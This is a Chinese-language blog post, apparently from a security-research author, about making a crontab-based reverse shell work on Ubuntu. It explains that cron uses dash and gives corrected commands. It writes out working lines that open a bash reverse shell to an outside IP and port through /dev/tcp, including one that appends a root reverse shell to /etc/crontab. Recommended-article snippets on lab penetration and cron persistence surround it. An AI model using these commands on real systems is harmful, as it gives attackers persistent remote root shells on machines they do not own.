Ubuntu使用crontab使用反弹shell问题处理

已于 2023-09-27 16:19:31 修改
阅读量1.1k 收藏 2
点赞数
CC 4.0 BY-SA版权
分类专栏: 安全研发 文章标签: ubuntu linux 运维
于 2022-12-15 17:31:45 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/SHELLCODE_8BIT/article/details/128332941

在ubuntu环境下做攻击时,会遇到下列情况,使用crontab -e写入如下命令反弹,会失败

* * * * * bash -i >& /dev/tcp/192.168.20.200/7777 0>&1

如果要直接写/etc/crontab,这是个系统级别的,要指定用户 

echo "* * * * * root bash -c \"bash -i >& /dev/tcp/10.211.55.5/7777 0>&1\"" >> /etc/crontab

 原因是在ubuntu下crontab启动默认使用dash来启动,而在dash启动会失败,我们可以来尝试一下。使用dash启动,会直接报如下错误

ubuntu反弹SHELL正确用法是

* * * * * bash -c "bash -i >& /dev/tcp/ip/port 0>&1"

在问题定位过程中,我们可以使用

service cron status

来定位crontab执行问题 

Ubuntu反弹shell的思考
07-02 1308
相信各位师傅在平时渗透过程中会遇到ubuntu任务计划反弹shell失败的情况,本文就这一问题浅析一下。
pWnos1.0 靶机渗透 (Perl CGI 的反弹 shell 利用)
m0_63416413的博客
10-05 1883
主机发现,机器开放 22, 80, 10000 端口80 端口发现 文件包含,可读到 /etc/passwd,但是没有读到 /etc/shadow漏洞脚本扫描结合浏览器访问观察,发现 10000 端口运行 webmin,搜索漏洞脚本利用使用 perl 脚本读取 /etc/passwd 和 /etc/shadow 内容,使用 john 破解 shadow,拿到 vmware 用户的明文密码使用 ssh 登录,期间配置 ssh 参数。获得初级 shell,观察无 sudo 权限,尝试提权。
Ubuntu使用技巧】Ubuntu22.04无人值守Crontab工具实战详解
最新发布
weixin_41809117的博客
12-31 1464
一个愿意伫立在巨人肩膀上的农民......CrontabLinux和类Unix操作系统下的一个任务调度工具,用于周期性地执行指定的任务或命令。Crontab允许用户创建和管理计划任务,以便在特定的时间间隔或时间点自动运行命令或脚本。这些任务可以按照分钟、小时、日、月和星期等不同的时间单位进行安排。
ubuntu利用crontab反弹shell
qq_68163788的博客
11-14 1215
Ubuntu中,反弹shell是指在远程服务器上建立一个与本地计算机的交互式连接,以便可以在远程服务器上执行命令和操作。这种连接通常是通过网络进行的,允许用户在不直接登录到远程服务器的情况下,进行远程管理和操作。 反弹shell通常使用一些常见的工具和技术来实现,包括SSH、Netcat、Metasploit等。用户可以在本地计算机上直接操作远程服务器,执行命令、浏览文件等操作。需要注意的是,反弹shell可能存在安全风险,因此在实际使用中应当谨慎操作,并确保对服务器进行充分的安全防护。
ubuntu的任务计划反弹shell
m0_65540912的博客
06-30 568
在实现的过程中,发现ubuntu靶机没有nc,无法用nc命令执行反弹的命令,而且执行计划任务的用户是什么,反弹过去的用户是一样的。
linux设置定时弹框,【奇技淫巧】linux 定时任务 crontab 反弹 shell
weixin_39736047的博客
05-14 350
日期:2018-11-26 13:47:34介绍:如何使用定时任务来反弹 shell?0x01、 基本命令参数-e:编辑该用户的计时器设置;-l:列出该用户的计时器设置;-r:删除该用户的计时器设置;-u :指定要设定计时器的用户名称。MAC 直接使用 crontab -e 无效:编辑 username 的 crontab$ sudo crontab -u username -e列出 userna...
实现ubuntu的任务计划反弹shell
m0_65522694的博客
07-02 554
也就是说linux中cron的命令执行的shell环境是/bin/sh 查看后发现,sh指向dash的软连接,由于dash的shell是没有交互能力的,所以将sh的软连接修改为bash。作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。在ubuntu的系统中使用crontab -e命令编写计划任务。使用tail -f /var/log/syslog查看日志。然后居然不存在这个文件夹 /bin/bash使用Ubuntu定时任务反弹shell
周期性计划crontab
MZLI_L的博客
11-08 736
文章目录crontab 周期性计划任务 crontab 周期性计划任务 环境 WSL_Ubuntu-20.04 kali 简介 通过编写指定格式的计划任务文件,定时循环执行相关任务命令。 文件格式 ``` # 6个字段 分 时 日 月 周 命令 # 前五个字段指定运行时间周期 # 最后是执行什么命令 # 特殊符号 # * : 代表任意 # / : 指定间隔频率,在第一个字段为 */10 表示每隔10分钟 # - : 代表从一个区间,第二个字段为 8-17 表示从8点到10点 # , : 分隔, 如第二个字
启动一个容器,挂载宿主机的/etc/目录,之后将反弹shell的脚本写入到/etc/crontab中,攻击机nc -vv -l -p Port会得到一个反弹shell  因为没有公网IP,就不试了。目标机上:
11-01
# 将反弹shell脚本添加到/etc/crontab ADD反弹shell脚本.sh /etc/crontab RUN chmod +x /etc/crontab/reboundshell脚本.sh CMD ["/usr/sbin/sshd", "-D"] ``` 2. **构建镜像**: 使用`docker build`命令基于...
crontab命令使用记录(精,反弹shell
墨痕诉清风的博客
11-24 2423
1. 编辑定时任务 crontab -e linux通用路径:/etc/crontab ubuntu被编辑的文件路径一般为:/var/spool/cron/当前用户 centos被编辑的文件路径一般为:/var/spool/cron/当前用户 2. 删除定时任务(情况) crontab -r 3. 查看现有定时任务 crontab -l 4. crountab 定时任务规则编写 */5 * * * * Command 每5分钟执行一次命...
实现Ubuntu计划任务的反弹shell
繁星
07-01 837
可以看到,不存在/bin/bash这个文件,或者说是没被找到,也就是说linux中cron的命令执行的shell环境是/bin/sh。查看后发现,sh是指向dash的软连接,由于dash的shell是没有交互能力的,所以要将sh的软链接修改为bash,注意要在root权限下进行修改!作用:是将一个交互式的bash shell的输出和错误发送到kali的8888端口,并将输入也从该端口读取。结果发现,等了两三分钟,一点反应都没有,没收到返回的shell;可见远程成功,成功反弹shell
Ubuntu计划任务反弹shell提权
Longwaer
01-03 1836
学习Ubuntu计划任务反弹shell原理,了解掌握Linux提权新技巧。
入侵redis之准备---Linux关于定时任务crontab相关知识了解配合理解shell反弹远程控制
guijianchouxyz的博客
11-25 1029
【1】crontab一般来说服务器都是有的,依赖crond服务,这个服务也是必须安装的服务,并且也是开机自启动的服务,也就是说,他基本上是一直在启动着的,至少小编这么多年的运维经验,每台服务器上面都有这个服务并且是正常启动的【2】好多的服务都需要依赖这个服务,比如定时清理日志脚本,定时磁盘检查,配合监控,流量排查甚至还有一些高级命令。比如sar命令,syslog日志轮询都是要依赖这个服务的以上两点,小编想表达的意思是是crontab这个服务很重要。
Ubuntu计划任务反弹shell
18年3月萌新白帽子
08-19 4316
首先介绍一下实验环境 1.被攻击者:Ubuntu 192.168.0.8 2.攻击者:kali  192.168.0.127   首先第一步在Ubuntu系统下添加crontab 计划任务 * * * * * bash -i  >& /etc/tcp/192.168.0.127/8888 0>&1   第二步在kali系统下使用nc命令监听8888端口...
linux 定时任务 crontab 反弹 shell
weixin_30699463的博客
06-26 1677
日期:2018-11-26 13:47:34 介绍:如何使用定时任务来反弹 shell? 0x01、 基本命令 参数 -e:编辑该用户的计时器设置; -l:列出该用户的计时器设置; -r:删除该用户的计时器设置; -u <用户名称>:指定要设定计时器的用户名称。 MAC 直接使用 crontab -e 无效: 编辑 username 的 cr...
Shell编程_定时反弹shell
soldi_er的博客
04-20 970
文章目录Shell编程hello反弹shellcrontab命令cron介绍使用crontab本地测试 Shell编程 hello   #!符号的作用是告诉操作系统,解释该脚本文件需要的的解释器和相应参数,比如-v是打印程序的源代码。 脚本内容: #!/bin/bash echo "hello, shell" 赋予执行权限:chmod +x test.sh 执行命令: ./test.sh、 或bash test.sh、 或source test.sh 反弹shell   反弹she
linux定时计划反弹shell
niqiu320的博客
05-26 2927
crontab crontab命令常见于Unix和Linux的操作系统之中,用于设置周期性被执行的指令。该命令从标准输入设备读取指令,并将其存放于“crontab”文件中,以供之后读取和执行。通常,crontab储存的指令被守护进程激活。crond 常常在后台运行,每一分钟检查是否有预定的作业需要执行。这类作业一般称为cron jobs。 安装(默认自带crontab) yum -y install vixie-cron yum -y install crontabs 说明: vixie-cron 软件包
crontab运行shell失败解决办法
weixin_30799995的博客
04-24 250
1 首先检查crontab服务是否运行 可在crontab -e 中加入 */1 * * * * 123 >test.txt 可查看crontab服务是否启动,如果没有启动,请想办法启动 2 把shellfile 的运行失败的原因打印出来。   可用重定向命令:shellfile >> <path>/logerror 2&>1...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

信安成长日记

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值